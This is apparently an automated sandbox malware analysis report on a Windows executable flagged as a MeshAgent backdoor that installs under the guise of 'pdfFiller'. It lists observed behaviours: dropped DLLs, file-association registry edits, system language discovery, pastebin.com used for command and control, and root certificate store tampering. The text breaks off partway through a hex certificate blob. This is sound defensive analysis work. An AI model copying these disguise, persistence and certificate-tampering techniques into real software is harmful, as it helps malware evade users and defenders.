Malware Analysis Report

2024-10-19 07:37

Sample ID 241014-cl8ckawcja
Target e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe
SHA256 e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f
Tags
discovery meshagent backdoor execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f

Threat Level: Known bad

The file e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe was found to be: Known bad.

Malicious Activity Summary

discovery meshagent backdoor execution persistence rat trojan

MeshAgent

Detects MeshAgent payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Sets service image path in registry

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-14 02:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-14 02:10

Reported

2024-10-14 02:13

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\pdfFiller\Griffin.Core.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\WebView2Loader.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-9HLP1.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-GRU83.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.native.unmanaged.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Newtonsoft.Json.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Buffers.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-CBKVG.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-IMI8Q.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-G65F7.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Runtime.CompilerServices.Unsafe.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-8AJVJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-TG47L.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\DeviceId.Windows.Mmi.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-G5O1G.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-JFKAP.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Reactive.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RQP8R.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-VQBU6.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-JJ1PJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\MaterialDesignThemes.Wpf.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Bcl.AsyncInterfaces.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Castle.Core.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-1M77N.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Text.Encodings.Web.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-OV015.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-SEG0P.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-853J2.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-1VVJM.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-C729U.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-7ROG4.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\SimpleInjector.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RITHH.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-BBUDG.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.native.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-8DNN2.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-PIRNP.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-7LH4R.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\AutoUpdater.NET.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-LIBOD.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-B0AS7.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.WinForms.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\DeviceId.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Wpf.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-2DQ6B.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-LTG6T.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\MaterialDesignColors.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Core.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Refit.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-4QSLL.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RKRJ7.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\DeviceId.Windows.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-TPIV8.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-TA7AJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Numerics.Vectors.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Xaml.Behaviors.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.ValueTuple.dll C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-MMVEH.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-G3S1R.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-LR236.tmp C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\pdfFiller\pdfFiller.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ppt\OpenWithProgids\pdfFillerFile.ppt C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pptx\OpenWithProgids\pdfFillerFile.pptx C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.txt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\OpenWithProgids\pdfFillerFile.pdf C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.docx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\DefaultIcon\ = "C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe,0" C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpeg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.png\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpeg\OpenWithProgids\pdfFillerFile.jpeg C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pptx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\ = "URL:pdfFiller Protocol" C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.doc\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\OpenWithProgids\pdfFillerFile.doc C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.ppt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\OpenWithProgids\pdfFillerFile.txt C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpg\OpenWithProgids\pdfFillerFile.jpg C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\Url Protocol C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.png\OpenWithProgids\pdfFillerFile.png C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command\ = "\"C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.docx\OpenWithProgids\pdfFillerFile.docx C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb